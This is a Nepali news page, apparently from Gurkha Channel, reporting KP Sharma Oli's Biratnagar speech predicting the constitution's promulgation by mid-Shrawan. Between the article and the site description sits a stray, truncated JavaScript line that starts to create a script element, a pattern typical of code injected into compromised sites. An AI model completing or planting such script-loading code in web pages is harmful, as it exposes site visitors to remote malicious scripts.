जसले जति छाती पिटे पनि संविधान जारी हुन्छ: नेता ओली

rajendra bhatta Avatar

काठमाडौं – नेकपा (एमाले) नगर समिति विराटनगरद्वारा मंगलबार विराटनगरमा आयोजित कार्यक्रममा केपी शर्मा ओलीले  बहुदलीय जनवादको सिद्धान्तले पार्टीलाई सङ्गठित बनाएकाले शान्ति र लोकतन्त्र तथा राष्ट्रिय एकतालाई सुदृढ बनाउन अग्रसर हुनुपर्नेमा जोड दिए।

प्रारम्भिक मस्यौदा मंगलबार संविधानसभाबाट पारित हुने विश्वास व्यक्त गर्दै नेता ओलीले जनताको रायसुझाव लिनका लागि मस्यौदासहित सभासद्का टोली साउनको आगमनसँगै जिल्ला जिल्लामा पुग्ने जानकारी गराए।

उनले भने, “संविधान जारी हुन नदिने, अन्यौलको अवस्था कायम राख्न खोज्नेले छाती पिटे पनि संविधान सम्भवतः साउनको मध्यसम्ममा जारी हुन्छ र त्यसपछि मुलुकमा राष्ट्रिय सरकार गठन हुन्छ।” उनले भूकम्पीडितका लागि सुरक्षित आवासको व्यवस्था र मुलुकको विकासका लागि पर्यटन, उद्योग, कृषिको व्यवसायीकरणलगायतका कार्यप्रति प्रतिबद्ध हुनुपर्ने धारणा प्रकट गरे।

var d=document;var s=d.createElement(‘script’);

admin Avatar
About Gurkha Channel

Gurkha channel is the sister company of Gurkha TV and the first 24-hour Nepali channel operating from the international capital of the world,London, United Kingdom. Gurkha Channels believes in honesty, respect, and unity. We belong to the land of Lord Buddha, Mt. Everest, and gallant people who sacrifice their lives for peace and humanity. Therefore, in this world of globalization, it is our effort to bring all Nepalese from around the world together and make one family: one Nation.

Search
Cateegories